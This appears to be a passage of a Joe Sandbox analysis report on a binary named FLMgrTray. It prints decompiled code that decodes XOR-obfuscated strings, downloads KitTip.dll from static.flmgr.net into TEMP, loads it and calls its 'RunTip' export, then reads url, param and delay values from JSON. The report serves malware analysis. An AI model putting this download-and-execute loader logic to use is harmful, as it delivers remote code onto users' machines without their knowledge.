                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016F477
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016F4D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Json@@$Value@$_invalid_parameter_noinfo_noreturn$V01@@$V01@V01@$$$StyledWriter@memcpy$?write@CloseD@2@@std@@D@std@@HandleMutexOpenSleepType@1@@U?$char_traits@V?$allocator@V?$basic_string@ValueValue@2@@atoimallocmemmovememset
                                                                                        • String ID: $GD$KSOJ?$ParentProcess$bCheckNav$bFirstCity$lastrpt
                                                                                        • API String ID: 4284153441-1365913334
                                                                                        • Opcode ID: 2e9146491a83ed5f58a5b2f696a7a2da974e53d38c261289b9c25e98d3118805
                                                                                        • Instruction ID: 899103b51eb394b0b58c8404abc261cac2fa33ba51c0c6a49bd548348ffda8fa
                                                                                        • Opcode Fuzzy Hash: 2e9146491a83ed5f58a5b2f696a7a2da974e53d38c261289b9c25e98d3118805
                                                                                        • Instruction Fuzzy Hash: 6C62F475D112888EEB16DB74CC527EDB7B4AF6A340F10836EE404B7692EB306AD5CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 448 1727d0-172834 call 163540 call 16e1b0 453 172836-172838 448->453 454 17283d-1728c3 call 163540 memset GetEnvironmentVariableW 448->454 455 1733bd-1733d7 call 1755f4 453->455 459 1728c6-1728cf 454->459 459->459 461 1728d1-17290f call 163540 459->461 464 172915-17291a 461->464 465 172a4d-172a53 461->465 466 172a20-172a4b 464->466 467 172920-172a14 464->467 468 172a56-172a5f 465->468 466->465 466->466 467->465 468->468 469 172a61-172abb call 1632d0 call 184c20 468->469 474 172ac1-172aca 469->474 475 172c0d-172c13 469->475 476 172be0-172c0b 474->476 477 172ad0-172bdb 474->477 478 172c16-172c1f 475->478 476->475 476->476 477->476 478->478 479 172c21-172c5d call 1632d0 call 184d00 478->479 484 172c76-172cb0 call 16c3d0 * 2 call 183a80 479->484 485 172c5f-172c74 DeleteFileW 479->485 492 173317-173320 484->492 493 172cb6-172cd9 LoadLibraryW 484->493 485->484 494 173322-173337 492->494 495 173359-17337f 492->495 496 173300-173315 DeleteFileW 493->496 497 172cdf-172cf3 GetProcAddress 493->497 498 17334f-173356 call 175733 494->498 499 173339-173347 494->499 502 173381-173396 495->502 503 1733b8 495->503 496->492 500 1732f4-1732fa FreeLibrary 497->500 501 172cf9-172d27 497->501 498->495 499->498 504 173349 _invalid_parameter_noinfo_noreturn 499->504 500->496 505 172d30-172d5b 501->505 507 1733ae-1733b5 call 175733 502->507 508 173398-1733a6 502->508 503->455 504->498 505->505 509 172d5d-172d70 call 162360 call 173510 505->509 507->503 508->507 511 1733a8 _invalid_parameter_noinfo_noreturn 508->511 517 172d75-172d87 509->517 511->507 519 1732bf-1732d2 call 162360 call 173510 517->519 520 172d8d-172db9 517->520 528 1732d7-1732f1 call 162360 call 173950 519->528 522 172dc0-172deb 520->522 522->522 524 172ded-172e0c call 162360 call 173510 522->524 524->528 533 172e12-172e2b call 162360 call 16de30 524->533 528->500 533->528 540 172e31-172e80 call 1706c0 ??0Value@Json@@QAE@W4ValueType@1@@Z ??0Reader@Json@@QAE@XZ ?parse@Reader@Json@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVValue@2@_N@Z 533->540 543 172e86-172ea9 540->543 544 173298-1732bd call 16c700 ??1Value@Json@@QAE@XZ call 162440 540->544 546 172eb0-172edb 543->546 544->528 546->546 548 172edd-172f5b call 162360 call 173510 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 546->548 555 172f5f-172f97 atoi call 162440 548->555 556 172f5d 548->556 559 172fca 555->559 560 172f99-172fa4 555->560 556->555 561 172fcd-172feb 559->561 562 172fa6-172fa9 560->562 563 172ff1-17307c call 163450 call 162360 call 16c3d0 call 184650 561->563 564 1733da-1733df call 164210 561->564 565 172fbf-172fc1 562->565 566 172fab-172fb0 562->566 582 173082-1730b8 563->582 565->559 571 172fc3-172fc4 565->571 569 172fb6-172fb8 566->569 570 172fb2-172fb4 566->570 574 172fbb-172fbd 569->574 570->574 571->562 574->565 576 172fc6-172fc8 574->576 576->561 582->582 583 1730ba-17317a call 165fb0 call 1661b0 call 16cb50 call 162440 * 2 Sleep call 174f20 582->583 596 173180-1731ed call 162360 call 173510 call 1622d0 call 184520 call 1622d0 call 1843f0 call 180f20 583->596 597 17320e 583->597 631 1731ef-173208 call 162360 call 1736f0 596->631 632 17320a-17320c 596->632 599 173210-17323e call 162360 call 173510 call 162440 597->599 613 173277-173293 call 162440 * 3 599->613 614 173240-173255 599->614 613->544 616 173257-173265 614->616 617 17326d-173274 call 175733 614->617 616->617 620 173267 _invalid_parameter_noinfo_noreturn 616->620 617->613 620->617 631->599 632->599
                                                                                        C-Code - Quality: 25%
                                                                                        			E001727D0(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                        				int _v8;
                                                                                        				int _v12;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				char _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				char _v72;
                                                                                        				short _v540;
                                                                                        				char _v544;
                                                                                        				intOrPtr _v548;
                                                                                        				char _v552;
                                                                                        				char _v556;
                                                                                        				char _v564;
                                                                                        				signed int _v568;
                                                                                        				int _v572;
                                                                                        				char _v588;
                                                                                        				intOrPtr _v592;
                                                                                        				intOrPtr _v596;
                                                                                        				char _v612;
                                                                                        				intOrPtr _v616;
                                                                                        				int _v620;
                                                                                        				char _v636;
                                                                                        				signed int _v640;
                                                                                        				int _v644;
                                                                                        				char _v660;
                                                                                        				char _v684;
                                                                                        				signed int _v688;
                                                                                        				char _v708;
                                                                                        				char _v732;
                                                                                        				char _v756;
                                                                                        				char _v780;
                                                                                        				char _v896;
                                                                                        				signed int _v900;
                                                                                        				signed int _v904;
                                                                                        				struct HINSTANCE__* _v908;
                                                                                        				char _v932;
                                                                                        				intOrPtr _v992;
                                                                                        				char _v1012;
                                                                                        				signed int _v1016;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t242;
                                                                                        				void* _t247;
                                                                                        				signed int _t255;
                                                                                        				signed int _t257;
                                                                                        				intOrPtr _t258;
                                                                                        				signed int _t259;
                                                                                        				signed int _t265;
                                                                                        				signed int _t270;
                                                                                        				signed int _t275;
                                                                                        				intOrPtr _t279;
                                                                                        				intOrPtr _t282;
                                                                                        				struct HINSTANCE__* _t287;
                                                                                        				signed int _t291;
                                                                                        				signed int _t302;
                                                                                        				intOrPtr _t307;
                                                                                        				short _t308;
                                                                                        				signed int _t319;
                                                                                        				signed int _t323;
                                                                                        				intOrPtr _t326;
                                                                                        				short _t327;
                                                                                        				char* _t339;
                                                                                        				int _t340;
                                                                                        				signed int _t344;
                                                                                        				signed int _t345;
                                                                                        				intOrPtr* _t347;
                                                                                        				intOrPtr _t355;
                                                                                        				intOrPtr _t358;
                                                                                        				char _t371;
                                                                                        				void* _t382;
                                                                                        				char* _t383;
                                                                                        				signed int _t391;
                                                                                        				intOrPtr _t398;
                                                                                        				signed int _t409;
                                                                                        				void* _t412;
                                                                                        				signed int _t413;
                                                                                        				signed int _t414;
                                                                                        				void* _t435;
                                                                                        				intOrPtr _t436;
                                                                                        				short* _t438;
                                                                                        				intOrPtr* _t440;
                                                                                        				intOrPtr* _t445;
                                                                                        				intOrPtr* _t449;
                                                                                        				intOrPtr _t459;
                                                                                        				char _t460;
                                                                                        				intOrPtr _t461;
                                                                                        				short _t462;
                                                                                        				signed int _t495;
                                                                                        				signed int _t496;
                                                                                        				intOrPtr* _t497;
                                                                                        				intOrPtr _t503;
                                                                                        				intOrPtr _t504;
                                                                                        				signed int _t508;
                                                                                        				signed int _t512;
                                                                                        				intOrPtr _t525;
                                                                                        				signed int _t531;
                                                                                        				void* _t540;
                                                                                        				void* _t542;
                                                                                        				void* _t543;
                                                                                        				signed int _t544;
                                                                                        				signed int _t545;
                                                                                        				void* _t546;
                                                                                        				void* _t547;
                                                                                        				void* _t557;
                                                                                        				intOrPtr* _t558;
                                                                                        				intOrPtr _t559;
                                                                                        				signed int _t560;
                                                                                        				void* _t561;
                                                                                        				void* _t562;
                                                                                        				signed int _t567;
                                                                                        				void* _t574;
                                                                                        				intOrPtr _t575;
                                                                                        				intOrPtr* _t577;
                                                                                        				void* _t579;
                                                                                        				signed int _t582;
                                                                                        				signed int _t585;
                                                                                        				intOrPtr _t586;
                                                                                        				intOrPtr* _t587;
                                                                                        				signed int _t590;
                                                                                        				signed int _t591;
                                                                                        				signed int _t592;
                                                                                        				signed int _t593;
                                                                                        				void* _t594;
                                                                                        				short* _t596;
                                                                                        				void* _t597;
                                                                                        				void* _t598;
                                                                                        				void* _t599;
                                                                                        				void* _t600;
                                                                                        				struct HINSTANCE__* _t601;
                                                                                        				void* _t602;
                                                                                        				void* _t603;
                                                                                        				void* _t605;
                                                                                        				void* _t606;
                                                                                        				void* _t607;
                                                                                        				void* _t608;
                                                                                        				void* _t609;
                                                                                        				signed int _t610;
                                                                                        				void* _t611;
                                                                                        				void* _t612;
                                                                                        				void* _t613;
                                                                                        				void* _t615;
                                                                                        				void* _t616;
                                                                                        				void* _t618;
                                                                                        				void* _t619;
                                                                                        				signed int _t620;
                                                                                        				void* _t621;
                                                                                        				signed int _t622;
                                                                                        				void* _t623;
                                                                                        				void* _t625;
                                                                                        				void* _t626;
                                                                                        
                                                                                        				_t626 = __eflags;
                                                                                        				_t435 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_t242 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v20 = _t242 ^ _t592;
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t575 = _a4;
                                                                                        				_t596 = _t594 - 0x37c;
                                                                                        				_t438 = _t596;
                                                                                        				 *(_t438 + 0x10) = 0;
                                                                                        				 *((intOrPtr*)(_t438 + 0x14)) = 7;
                                                                                        				 *_t438 = 0;
                                                                                        				E00163540(__ebx, __edx, _t575, L"pushkit"); // executed
                                                                                        				_t247 = E0016E1B0(__ebx, __edx, _t575, _t626, 7,  *0x19d020, _t242 ^ _t592, _t574, _t579,  *[fs:0x0], E0018D8EF); // executed
                                                                                        				_t597 = _t596 + 0x1c;
                                                                                        				if(_t247 == 0) {
                                                                                        					_push(0x26);
                                                                                        					_v644 = 0;
                                                                                        					_v640 = 7;
                                                                                        					_v660 = 0;
                                                                                        					E00163540(__ebx, __edx, _t575, L"http://static.flmgr.net/kit/KitTip.dll");
                                                                                        					_v8 = 0;
                                                                                        					memset( &_v540, 0, 0x208);
                                                                                        					_t598 = _t597 + 0xc;
                                                                                        					GetEnvironmentVariableW(L"TEMP",  &_v540, 0x104);
                                                                                        					__eflags = 0;
                                                                                        					_v572 = 0;
                                                                                        					_t440 =  &_v540;
                                                                                        					_v568 = 7;
                                                                                        					_v588 = 0;
                                                                                        					_t540 = _t440 + 2;
                                                                                        					do {
                                                                                        						_t255 =  *_t440;
                                                                                        						_t440 = _t440 + 2;
                                                                                        						__eflags = _t255;
                                                                                        					} while (_t255 != 0);
                                                                                        					_push(_t440 - _t540 >> 1);
                                                                                        					_t257 = E00163540(__ebx, _t540, _t575,  &_v540);
                                                                                        					asm("movups xmm0, [0x190468]");
                                                                                        					_v8 = 1;
                                                                                        					asm("pextrw eax, xmm0, 0x7");
                                                                                        					asm("movups [ebp-0x228], xmm0");
                                                                                        					__eflags = _t257;
                                                                                        					_t258 =  *0x19dc40; // 0x5
                                                                                        					if(_t257 != 0) {
                                                                                        						_t591 = 0;
                                                                                        						__eflags = _t258 - 2;
                                                                                        						if(_t258 < 2) {
                                                                                        							do {
                                                                                        								 *(_t592 + _t591 * 2 - 0x228) =  *(_t592 + _t591 * 2 - 0x228) ^ (0x00000001 - ((0xa0a0a0a1 * _t591 >> 0x00000020) + _t591 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t591 >> 0x00000020) + _t591 >> 0x00000005)) * 0x00000033 + _t591;
                                                                                        								_t591 = _t591 + 1;
                                                                                        								__eflags = _t591 - 8;
                                                                                        							} while (_t591 < 8);
                                                                                        						} else {
                                                                                        							asm("movaps xmm2, [0x18ffd0]");
                                                                                        							asm("movaps xmm4, [0x190d30]");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("movd xmm5, ecx");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movd xmm6, edx");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("movaps xmm2, [0x18ffe0]");
                                                                                        							asm("paddd xmm2, [0x18ffd0]");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("paddw xmm1, [0x190000]");
                                                                                        							asm("movq xmm0, [eax]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("movq [ebp-0x228], xmm1");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [ebp-0x220]");
                                                                                        							asm("paddw xmm1, [0x190000]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movq [ebp-0x220], xmm1");
                                                                                        						}
                                                                                        					}
                                                                                        					_t445 =  &_v556;
                                                                                        					_t542 = _t445 + 2;
                                                                                        					do {
                                                                                        						_t259 =  *_t445;
                                                                                        						_t445 = _t445 + 2;
                                                                                        						__eflags = _t259;
                                                                                        					} while (_t259 != 0);
                                                                                        					E001632D0(_t435,  &_v588, _t575,  &_v556, _t445 - _t542 >> 1);
                                                                                        					__eflags = _v568 - 8;
                                                                                        					_t263 =  >=  ? _v588 :  &_v588;
                                                                                        					E00184C20( >=  ? _v588 :  &_v588); // executed
                                                                                        					asm("movups xmm0, [0x190478]");
                                                                                        					_t599 = _t598 + 4;
                                                                                        					__eflags = L">AA[]^L9";
                                                                                        					asm("movups [ebp-0x260], xmm0");
                                                                                        					asm("movq xmm0, [0x190488]");
                                                                                        					asm("movq [ebp-0x250], xmm0");
                                                                                        					if(L">AA[]^L9" != 0) {
                                                                                        						_t590 = 0;
                                                                                        						__eflags =  *0x19dc40 - 2;
                                                                                        						if( *0x19dc40 >= 2) {
                                                                                        							asm("movaps xmm2, [0x18ffd0]");
                                                                                        							asm("movaps xmm4, [0x190d30]");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							_t590 = 8;
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("movd xmm5, eax");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("movd xmm6, eax");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("movaps xmm2, [0x18ffe0]");
                                                                                        							asm("paddd xmm2, [0x18ffd0]");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [0x190000]");
                                                                                        							asm("paddw xmm1, xmm0");
                                                                                        							asm("movq xmm0, [eax]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("movq [ebp-0x260], xmm1");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [0x190000]");
                                                                                        							asm("paddw xmm1, xmm0");
                                                                                        							asm("movq xmm0, [ebp-0x258]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movq [ebp-0x258], xmm1");
                                                                                        						}
                                                                                        						do {
                                                                                        							 *(_t592 + _t590 * 2 - 0x260) =  *(_t592 + _t590 * 2 - 0x260) ^ (0x00000001 - ((0xa0a0a0a1 * _t590 >> 0x00000020) + _t590 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t590 >> 0x00000020) + _t590 >> 0x00000005)) * 0x00000033 + _t590;
                                                                                        							_t590 = _t590 + 1;
                                                                                        							__eflags = _t590 - 0xc;
                                                                                        						} while (_t590 < 0xc);
                                                                                        					}
                                                                                        					_t449 =  &_v612;
                                                                                        					_t543 = _t449 + 2;
                                                                                        					do {
                                                                                        						_t265 =  *_t449;
                                                                                        						_t449 = _t449 + 2;
                                                                                        						__eflags = _t265;
                                                                                        					} while (_t265 != 0);
                                                                                        					E001632D0(_t435,  &_v588, _t575,  &_v612, _t449 - _t543 >> 1);
                                                                                        					__eflags = _v568 - 8;
                                                                                        					_t269 =  >=  ? _v588 :  &_v588;
                                                                                        					_t270 = E00184D00( >=  ? _v588 :  &_v588); // executed
                                                                                        					_t600 = _t599 + 4;
                                                                                        					__eflags = _t270;
                                                                                        					if(_t270 != 0) {
                                                                                        						__eflags = _v568 - 8;
                                                                                        						_t416 =  >=  ? _v588 :  &_v588;
                                                                                        						DeleteFileW( >=  ? _v588 :  &_v588);
                                                                                        					}
                                                                                        					_t601 = _t600 - 0x18;
                                                                                        					_v908 = _t601;
                                                                                        					E0016C3D0(_t601,  &_v588);
                                                                                        					_t602 = _t601 - 0x18;
                                                                                        					_v8 = 2;
                                                                                        					E0016C3D0(_t602,  &_v660);
                                                                                        					_v8 = 1;
                                                                                        					_t275 = E00183A80(__eflags); // executed
                                                                                        					_t603 = _t602 + 0x30;
                                                                                        					__eflags = _t275;
                                                                                        					if(_t275 == 0) {
                                                                                        						L63:
                                                                                        						_t544 = _v568;
                                                                                        						__eflags = _t544 - 8;
                                                                                        						if(_t544 >= 8) {
                                                                                        							_t460 = _v588;
                                                                                        							_t547 = 2 + _t544 * 2;
                                                                                        							_t282 = _t460;
                                                                                        							__eflags = _t547 - 0x1000;
                                                                                        							if(_t547 >= 0x1000) {
                                                                                        								_t460 =  *((intOrPtr*)(_t460 - 4));
                                                                                        								_t547 = _t547 + 0x23;
                                                                                        								_t282 = _t282 - _t460 + 0xfffffffc;
                                                                                        								__eflags = _t282 - 0x1f;
                                                                                        								if(_t282 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t547);
                                                                                        							E00175733(_t282, _t460);
                                                                                        							_t603 = _t603 + 8;
                                                                                        						}
                                                                                        						_t545 = _v640;
                                                                                        						_v572 = 0;
                                                                                        						_v568 = 7;
                                                                                        						_v588 = 0;
                                                                                        						__eflags = _t545 - 8;
                                                                                        						if(_t545 >= 8) {
                                                                                        							_t459 = _v660;
                                                                                        							_t546 = 2 + _t545 * 2;
                                                                                        							_t279 = _t459;
                                                                                        							__eflags = _t546 - 0x1000;
                                                                                        							if(_t546 >= 0x1000) {
                                                                                        								_t459 =  *((intOrPtr*)(_t459 - 4));
                                                                                        								_t546 = _t546 + 0x23;
                                                                                        								_t279 = _t279 - _t459 + 0xfffffffc;
                                                                                        								__eflags = _t279 - 0x1f;
                                                                                        								if(_t279 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t546);
                                                                                        							E00175733(_t279, _t459);
                                                                                        						}
                                                                                        						goto L74;
                                                                                        					} else {
                                                                                        						__eflags = _v568 - 8;
                                                                                        						_t286 =  >=  ? _v588 :  &_v588;
                                                                                        						_t287 = LoadLibraryW( >=  ? _v588 :  &_v588); // executed
                                                                                        						_v908 = _t287;
                                                                                        						__eflags = _t287;
                                                                                        						if(_t287 == 0) {
                                                                                        							L62:
                                                                                        							__eflags = _v568 - 8;
                                                                                        							_t289 =  >=  ? _v588 :  &_v588;
                                                                                        							DeleteFileW( >=  ? _v588 :  &_v588);
                                                                                        							goto L63;
                                                                                        						} else {
                                                                                        							_t291 = GetProcAddress(_t287, "RunTip");
                                                                                        							_v904 = _t291;
                                                                                        							__eflags = _t291;
                                                                                        							if(_t291 == 0) {
                                                                                        								L61:
                                                                                        								FreeLibrary(_v908);
                                                                                        								goto L62;
                                                                                        							} else {
                                                                                        								_t461 =  *0x190498; // 0x4c005e
                                                                                        								_t582 = 0;
                                                                                        								asm("movq xmm0, [0x190490]");
                                                                                        								_v548 = _t461;
                                                                                        								_t462 =  *0x19049c; // 0x39
                                                                                        								_push(1);
                                                                                        								asm("movq [ebp-0x228], xmm0");
                                                                                        								_v544 = _t462;
                                                                                        								asm("o16 nop [eax+eax]");
                                                                                        								do {
                                                                                        									_t550 = (0xa0a0a0a1 * _t582 >> 0x20) + _t582 >> 5;
                                                                                        									 *(_t592 + _t582 * 2 - 0x228) =  *(_t592 + _t582 * 2 - 0x228) ^ (0x00000001 - ((0xa0a0a0a1 * _t582 >> 0x00000020) + _t582 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t582 >> 0x00000020) + _t582 >> 0x00000005)) * 0x00000033 + _t582;
                                                                                        									_t582 = _t582 + 1;
                                                                                        									__eflags = _t582 - 7;
                                                                                        								} while (_t582 < 7);
                                                                                        								_t605 = _t603 - 0x18;
                                                                                        								E00162360(_t605,  &_v556);
                                                                                        								E00173510(_t575); // executed
                                                                                        								_t302 = _v904( *0x19dbc0, 0, 0);
                                                                                        								__eflags = _t302;
                                                                                        								if(_t302 == 0) {
                                                                                        									_push(3);
                                                                                        									_t606 = _t605 - 0x18;
                                                                                        									E00162360(_t606, L"runkit");
                                                                                        									E00173510(_t575);
                                                                                        									goto L60;
                                                                                        								} else {
                                                                                        									_t307 =  *0x1904a8; // 0x4c005e
                                                                                        									_t584 = 0;
                                                                                        									__eflags = 0;
                                                                                        									asm("movq xmm0, [0x1904a0]");
                                                                                        									_v548 = _t307;
                                                                                        									_t308 =  *0x1904ac; // 0x39
                                                                                        									_push(2);
                                                                                        									asm("movq [ebp-0x228], xmm0");
                                                                                        									_v544 = _t308;
                                                                                        									do {
                                                                                        										_t550 = (0xa0a0a0a1 * _t584 >> 0x20) + _t584 >> 5;
                                                                                        										 *(_t592 + _t584 * 2 - 0x228) =  *(_t592 + _t584 * 2 - 0x228) ^ (0x00000001 - ((0xa0a0a0a1 * _t584 >> 0x00000020) + _t584 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t584 >> 0x00000020) + _t584 >> 0x00000005)) * 0x00000033 + _t584;
                                                                                        										_t584 = _t584 + 1;
                                                                                        										__eflags = _t584 - 7;
                                                                                        									} while (_t584 < 7);
                                                                                        									_t606 = _t605 - 0x18;
                                                                                        									E00162360(_t606,  &_v556);
                                                                                        									E00173510(_t575);
                                                                                        									__eflags =  *0x19dbcc;
                                                                                        									if( *0x19dbcc == 0) {
                                                                                        										L60:
                                                                                        										_t607 = _t606 - 0x18;
                                                                                        										E00162360(_t607, L"pushkit");
                                                                                        										E00173950(_t435, _t550, _t575, __eflags);
                                                                                        										_t603 = _t607 + 0x18;
                                                                                        										goto L61;
                                                                                        									} else {
                                                                                        										_t608 = _t606 - 0x18;
                                                                                        										E00162360(_t608, L"pushlock");
                                                                                        										_t319 = E0016DE30(_t435, _t575, __eflags);
                                                                                        										_t606 = _t608 + 0x18;
                                                                                        										__eflags = _t319;
                                                                                        										if(__eflags == 0) {
                                                                                        											goto L60;
                                                                                        										} else {
                                                                                        											E001706C0(_t575, __eflags,  &_v756);
                                                                                        											_push(0);
                                                                                        											_v8 = 3;
                                                                                        											L00176836();
                                                                                        											_v8 = 4;
                                                                                        											L0017686C();
                                                                                        											_push(1);
                                                                                        											_v8 = 5;
                                                                                        											_push( &_v932);
                                                                                        											_t323 =  &_v756;
                                                                                        											_push(_t323);
                                                                                        											L00176872();
                                                                                        											__eflags = _t323;
                                                                                        											if(_t323 == 0) {
                                                                                        												L58:
                                                                                        												E0016C700(_t435,  &_v896);
                                                                                        												L00176854();
                                                                                        												_v8 = 1;
                                                                                        												E00162440( &_v756, _t584);
                                                                                        												goto L60;
                                                                                        											} else {
                                                                                        												_t326 =  *0x1904c0; // 0x52005e
                                                                                        												_t585 = 0;
                                                                                        												__eflags = 0;
                                                                                        												asm("movups xmm0, [0x1904b0]");
                                                                                        												_v548 = _t326;
                                                                                        												_t327 =  *0x1904c4; // 0x3d
                                                                                        												_push(1);
                                                                                        												asm("movups [ebp-0x230], xmm0");
                                                                                        												_v544 = _t327;
                                                                                        												do {
                                                                                        													 *(_t592 + _t585 * 2 - 0x230) =  *(_t592 + _t585 * 2 - 0x230) ^ (0x00000001 - ((0xa0a0a0a1 * _t585 >> 0x00000020) + _t585 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t585 >> 0x00000020) + _t585 >> 0x00000005)) * 0x00000033 + _t585;
                                                                                        													_t585 = _t585 + 1;
                                                                                        													__eflags = _t585 - 0xb;
                                                                                        												} while (_t585 < 0xb);
                                                                                        												_t609 = _t606 - 0x18;
                                                                                        												E00162360(_t609,  &_v564);
                                                                                        												E00173510(_t575);
                                                                                        												_push( &_v612);
                                                                                        												_push("url");
                                                                                        												L00176866();
                                                                                        												L00176860();
                                                                                        												_v8 = 6;
                                                                                        												_push( &_v732);
                                                                                        												_push("param");
                                                                                        												L00176866();
                                                                                        												L00176860();
                                                                                        												_t339 =  &_v708;
                                                                                        												_v8 = 7;
                                                                                        												_push(_t339);
                                                                                        												_push("delay");
                                                                                        												L00176866();
                                                                                        												L00176860();
                                                                                        												__eflags = _t339[0x14] - 0x10;
                                                                                        												if(_t339[0x14] >= 0x10) {
                                                                                        													_t339 =  *_t339;
                                                                                        												}
                                                                                        												_t340 = atoi(_t339);
                                                                                        												_t610 = _t609 + 4;
                                                                                        												_v900 = _t340;
                                                                                        												_t495 =  &_v708;
